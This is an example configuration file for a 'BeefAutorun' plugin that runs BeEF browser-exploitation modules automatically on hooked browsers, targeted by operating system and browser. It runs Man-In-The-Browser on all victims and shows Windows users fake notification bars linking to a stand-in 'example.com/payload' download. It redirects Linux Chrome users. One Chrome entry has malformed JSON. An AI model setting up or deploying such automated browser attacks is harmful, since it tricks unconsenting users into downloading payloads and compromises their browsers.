#Example config file for the BeefAutorun plugin

mode = oneshot #can be set to loop, or oneshot

#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
#in oneshot mode the plugin will run modules only once per hooked browser

[ALL]  #Runs specified modules on all hooked browsers

'Man-In-The-Browser'= '{}'


[targets]  #Runs specified modules based on OS and Browser type
	
	[[Windows]]  #Target all Windows versions using Firefox and Internet Explorer
		
		[[[FF]]]
		'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'

		[[[IE]]]
		'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'

	[[Windows 7]]  #Target only Windows 7 using Chrome
		
		[[[C]]]
		'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'

	[[Linux]] #Target Linux platforms using Chrome

		[[[C]]]
		'Redirect Browser (Rickroll)' = '{}'